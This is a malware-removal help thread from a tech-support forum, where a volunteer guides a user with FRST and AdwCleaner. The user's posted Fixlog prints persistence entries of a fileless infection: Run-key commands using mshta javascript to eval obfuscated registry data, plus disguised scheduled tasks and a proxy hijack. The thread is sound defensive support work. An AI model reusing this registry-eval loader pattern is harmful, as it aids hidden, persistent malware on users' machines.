Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help! There are multiple Internet Explorers running in the background


  • This topic is locked This topic is locked
7 replies to this topic

#1 VNCBLAO

VNCBLAO

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:05:23 PM

Posted 17 June 2015 - 01:52 PM

Hi, 

I need a fixlist.txt because whenever I open Task Manager, there are several Internet Explorers running. I have used Farbar Recovery Scan Tool and attached are the FRST.txt and Addition.txt. 

 

I have a Windows desktop running Windows 7 Home Premium 64bit Service Pack 1

 

Could you please provide a fixlist.txt? Thank you

Attached File  FRST.txt   85.45KB   9 downloads

Attached File  Addition.txt   54.43KB   4 downloads



BC AdBot (Login to Remove)

 


#2 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:04:23 PM

Posted 17 June 2015 - 08:43 PM

Hello 

VNCBLAO

,

  • Welcome to Bleeping Computer.
  • My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  • Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
      
  • If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
      
  • Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  • In the upper right hand corner of the topic you will see a button called Follow This Topic.I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.

      
  • Finally, please reply using the Post  button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  •   I will be analyzing your log. I will get back to you with instructions.

 

 

1.

Download attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

Attached File  fixlist.txt   7.54KB   3 downloads

 

 

2.

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool .
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer.
  • After the scan has finished...
  • Click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

How is the machine running after this fix?

 

 


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#3 VNCBLAO

VNCBLAO
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:05:23 PM

Posted 18 June 2015 - 10:08 AM

Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version:13-06-2015
Ran by Tuan at 2015-06-18 10:53:19 Run:1
Running from C:\Users\Tuan\Desktop
Loaded Profiles: Tuan (Available Profiles: Tuan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKLM-x32\...\Run: [**5ceec7bd<*>] => mshta javascript:GPN6w4Wa="NPkFObjk2";Ng5=new%20ActiveXObject("WScript.Shell");zYyQN0x3="6aG1XckwH";O3OEa=Ng5.RegRead("HKLM\\software\\Wow6432Node\\0f0b7255\\e3fb8071");XNrJ0c7a="4WG";eval(O3OEa);aCwZ (the data entry has 9 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\...\Run: [**5ceec7bd<*>] => mshta javascript:UVrZanf83="AyZcY1FDl";Y8v=new%20ActiveXObject("WScript.Shell");yRgydccf3="U9q35fU";sLEn1=Y8v.RegRead("HKCU\\software\\0f0b7255\\e3fb8071");HpySx3qgE="m";eval(sLEn1);LOHo2SuoW="TnVbv"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\...\Run: [**872a2c92<*>] => mshta javascript:BBz2dTFoh="jycnJkf28";Q7f=new%20ActiveXObject("WScript.Shell");w6QaaXx="xNc6SX";x1ZyH5=Q7f.RegRead("HKCU\\software\\0ef77b06\\43738959");i0alIdYJV="DgjRFzDv";eval(x1ZyH5);CXIRsc07="N" (the data entry has 1 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\...\Run: [**7a01a4ba<*>] => mshta javascript:C1RnZ8qkTt="MHO3g";h6o4=new%20ActiveXObject("WScript.Shell");nl8AMPpRl="9EoSqNGT";vpK9O=h6o4.RegRead("HKCU\\software\\0ef77b06\\43738959");VoVGeDh6m="Q6xqt2";eval(vpK9O);GYG1AyTFY0="R (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
ProxyServer: [S-1-5-21-2126934134-17229050-3056980699-1000] => 06952156:80
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
SearchScopes: HKU\S-1-5-21-2126934134-17229050-3056980699-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Live Malware Protection; C:\Windows\mlwps.exe [X] <==== ATTENTION
S1 StarOpen; No ImagePath
C:\Users\Tuan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpogujwh.dll
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
Task: {6094364B-C305-4DE9-9BD7-B5CC0DED1099} - System32\Tasks\enpjhni => C:\Users\Tuan\AppData\Local\Temp\kxvgvai.exe <==== ATTENTION
Task: {B008A8C2-FF94-444C-8AC2-C8148E3353ED} - System32\Tasks\Windows Updater => C:\Users\Tuan\AppData\Roaming\Updater\winupd.exe <==== ATTENTION
Task: {CC7B26BC-88F9-416D-A099-52F8846EF0A3} - System32\Tasks\Malware Cleaner => C:\Users\Tuan\AppData\Roaming\6CD6.tmp.exe <==== ATTENTION
C:\Users\Tuan\AppData\Local\Temp\E2AA.tmp.exe
 
*****************
 
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**5ceec7bd<*> => value removed successfully
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**5ceec7bd<*> => value could not remove. Error getting handle(4): -1073741765
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**872a2c92<*> => value removed successfully
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**7a01a4ba<*> => value removed successfully
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found. 
gupdate => Service removed successfully
gupdatem => Service removed successfully
Live Malware Protection => Service removed successfully
StarOpen => Service removed successfully
"C:\Users\Tuan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpogujwh.dll" => File/Folder not found.
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6094364B-C305-4DE9-9BD7-B5CC0DED1099}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6094364B-C305-4DE9-9BD7-B5CC0DED1099}" => key removed successfully
C:\Windows\System32\Tasks\enpjhni => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\enpjhni" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B008A8C2-FF94-444C-8AC2-C8148E3353ED}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B008A8C2-FF94-444C-8AC2-C8148E3353ED}" => key removed successfully
C:\Windows\System32\Tasks\Windows Updater => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows Updater" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CC7B26BC-88F9-416D-A099-52F8846EF0A3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC7B26BC-88F9-416D-A099-52F8846EF0A3}" => key removed successfully
C:\Windows\System32\Tasks\Malware Cleaner => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Malware Cleaner" => key removed successfully
"C:\Users\Tuan\AppData\Local\Temp\E2AA.tmp.exe" => File/Folder not found.
 
==== End of Fixlog 10:53:22 ====
 
AdwCleaner[S0].txt:
 
# AdwCleaner v4.206 - Logfile created 18/06/2015 at 10:59:00
# Updated 01/06/2015 by Xplode
# Database : 2015-06-17.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : Tuan - Tuan-PC
# Running from : C:\Users\Tuan\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : Live Malware Protection
[#] Service Deleted : PrivoxyService
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Program Files (x86)\Softcomp Software
Folder Deleted : C:\Users\Tuan\AppData\Roaming\Updater
 
***** [ Scheduled tasks ] *****
 
Task Deleted : Softcomp Software Uninstaller
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{2F137995-4D26-44AD-9C4E-91055090A817}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.logmeinrescue.*;*.radialpoint.*;*rogerspremiumservices.*
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17840
 
 
-\\ Google Chrome v43.0.2357.81
 
 
*************************
 
AdwCleaner[R0].txt - [1955 bytes] - [18/06/2015 10:56:39]
AdwCleaner[S0].txt - [1876 bytes] - [18/06/2015 10:59:00]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1935  bytes] ##########
 


#4 VNCBLAO

VNCBLAO
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:05:23 PM

Posted 18 June 2015 - 10:15 AM

Hi Fireman4it

 

Thanks for getting back so quickly. Unfortunately, my computer is still lagging and running slow. Also, there are still multiple Internet Explorers running. 

 

Is there anything else we can do?

 

Thank you again



#5 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:04:23 PM

Posted 19 June 2015 - 10:47 PM

yes there is much more we can do. i have a family emergency and will get back with you as soon as possible


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:04:23 PM

Posted 26 June 2015 - 07:50 PM

  • Download Emsisoft Emergency Kit and save it to your desktop.
  • Double click on the EmsisoftEmergencyKit.exe icon, click Run then Extract
  • Double click the Start Emsisoft Emergency Kit icon that will appear after extraction
  • Click Yes to update the program
  • Once the update is completed click the Back button
  • Click on 2. Scan (not Quick Scan or Smart Scan)
  • Click Yes to detect Potentially Unwanted Programs (PUPs)
  • Patiently wait for the thorough scan to complete, this can be a lengthy process
  • Once completed click Quarantine selected objects (if computer is clean you will not have this option) then click OK
  • Click View Report
  • Attach the report to your reply
  • Close the program then click Close


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#7 VNCBLAO

VNCBLAO
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:05:23 PM

Posted 27 June 2015 - 10:07 AM

Hi Fireman4it

 

We have had a situation where the use of our computer was needed, therefore we took the steps necessary to reformat our computer. The computer is now running fast and efficient. 

 

Thank you very much for your time and effort in helping us in this matter. In the future, if we have any more problems, we will definitely come back to this forum for help. 

 

VNCBLAO



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:04:23 PM

Posted 28 June 2015 - 10:02 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users